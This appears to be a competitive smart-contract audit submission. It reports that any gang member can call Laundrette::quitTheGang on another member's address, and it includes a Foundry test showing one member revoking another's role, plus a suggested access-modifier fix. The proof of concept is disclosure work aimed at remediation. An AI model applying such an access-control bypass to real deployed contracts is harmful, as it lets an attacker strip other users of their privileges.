Submission Details
Severity:
Every gangmember can kick other gangmembers out of the gang.
Summary
Every gangmember can kick other gangmembers out of the gang.
Vulnerability Details
Every gangmember can call Laundrette::quitTheGang with any other gangmember's address as an argument. Which will lead to revoking their gangmember role as can be seen in the example bellow.
Paste this in Laundrette.t.sol and run forge test --match-test test_everyGangMemberCanKickAnotherMemberOut
function test_everyGangMemberCanKickAnotherMemberOut() public {
address gangMemberOne = makeAddr("Tommy Shelby");
address gangMemberTwo = makeAddr("Michael Shelby");
joinGang(gangMemberOne);
//Add the second gang member and add guns for test purposes
vm.startPrank(godFather);
laundrette.addToTheGang(gangMemberTwo);
laundrette.putGunsInTheSuspendedCeiling(gangMemberTwo, 3);
assertEq(weaponShelf.getAccountAmount(gangMemberTwo), 3);
vm.stopPrank();
vm.prank(gangMemberTwo);
//gangMemberTwo Can call takeGuns because he is still a gang member
laundrette.takeGuns(gangMemberTwo, 1);
assertEq(weaponShelf.getAccountAmount(gangMemberTwo), 2);
//gangMemerOne kicks out gangMemberTwo from the gang
vm.prank(gangMemberOne);
laundrette.quitTheGang(gangMemberTwo);
vm.prank(gangMemberTwo);
//takeGuns should revert because gangMemberTwo is not a gangMember anymore
vm.expectRevert();
laundrette.takeGuns(gangMemberTwo, 1);
}
Impact
Malicious member can remove all other gangmembers from the gang.
Tools Used
Manual Review
Unit tests
Recommendations
Add isAuhtorizedOrRevert modifier to the function:
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert{
kernel.revokeRole(Role.wrap("gangmember"), account);
}
Updates
Lead Judging Commences
n0kto about 1 year ago
Submission Judgement Published Assigned finding tags:
Gang members ban other members
Rewards breakdown
nSLOC
205This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.